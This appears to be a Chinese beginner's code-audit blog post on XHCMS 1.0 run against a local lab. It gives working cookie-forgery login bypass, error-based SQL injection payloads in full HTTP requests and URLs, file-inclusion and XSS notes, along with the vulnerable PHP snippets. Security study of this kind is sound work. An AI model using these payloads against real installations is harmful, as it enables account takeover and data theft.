目录
3、admin/files/editsoft.php与admin/files/editwz.php
这个应该是比较简单的php代码审计了,适合新手
cms下载地址:
https://down.chinaz.com/soft/36930.htm
然后phpstudy环境搭建,php版本要小于7,之后要自己新建一个数据库
访问
http://localhost/xhcms1.0/install/index.php
在cnvd里面看到有很多漏洞,一个个尝试吧
(1)后台存在登录绕过漏洞
提示我们可以通过伪造cookie绕过登录检测,代码位于inc\checklogin.php
如果cookie里面的user为空就转到登录页面,那我们可以给user赋值来绕过
直接访问admin/页面
直接进入到了网站后台。
(2)登录后台user处存在SQL注入
代码位于admin\files\login.php
""){$query = "SELECT * FROM manage WHERE user='$user'";$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());$users = mysql_fetch_array($result);if (!mysql_num_rows($result)) { echo "";exit;}else{$passwords=$users['password'];//echo $passwords;if(md5($password)<>$passwords){echo "";exit;}//写入登录信息并记住30天if ($checkbox==1){setcookie('user',$user,time()+3600*24*30,'/');}else{setcookie('user',$user,0,'/');}echo "";exit;}exit;ob_end_flush();}?>
这里没有对user进行过滤,直接拼接到了SQL语句里面,所以我们可以构造一下报错注入
POST /xhcms1.0/admin/?r=login HTTP/1.1Host: 192.168.10.128Content-Length: 95Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://192.168.10.128Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,**;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://192.168.10.128/xhcms1.0/admin/?r=loginAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeuser=admin'or updatexml(1,concat(0x7e,mid((select password from manage),2,33)),1)#&password=123&login=yes
md5解密
可以得知admin密码为admin
(3)前(后)台文件包含漏洞
前台漏洞代码位于:index.php,后台漏洞代码位于:admin\index.php
get方式获取r,然后经过addslashes函数处理,之后判断,再然后拼接读取
如果php版本小于等于5.3.4可以使用%00截断实现任意文件读取,但如果高了就只能进行php文件读取
(4)后台SQL注入
1、admin/files/editcolumn
$id=$_GET['id'];$type=$_GET['type'];if ($type==1){$query = "SELECT * FROM nav WHERE id='$id'";$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());$nav = mysql_fetch_array($resul);}
很明显的SQL注入漏洞
http://localhost/xhcms1.0/admin/index.php?r=editcolumn&type=1&id=1'%20or%20updatexml(1,concat(0x7e,database()),1)%23
2、admin/files/editlink.php
$id=$_GET['id'];$query = "SELECT * FROM link WHERE id='$id'";$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());$link = mysql_fetch_array($resul);
几乎一模一样
3、admin/files/editsoft.php与admin/files/editwz.php
也是一样的
4、and '1'='1闭合构造SQL注入
POST /xhcms1.0/admin/index.php?r=editcolumn&type=1&id=1 HTTP/1.1Host: 192.168.10.128Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: user=adminConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 111save=1&name=a' or updatexml(1,concat(0x7e,version()),1) and '1'='1&keywords=b&description=c&xs=d&px=e&content=f
还有很多类似的,像manageinfo.php里面也有
(5)前台xss漏洞
1、/files/contact.php
/index.php?r=contact&page=
$page=addslashes($_GET['page']);if ($page<>""){if ($page<>1){$pages="第".$page."页 - ";}}
-
没有过滤直接拼接
2、/files/content.php
差不多的,id
">
来源地址:https://blog.csdn.net/m0_60716947/article/details/128611888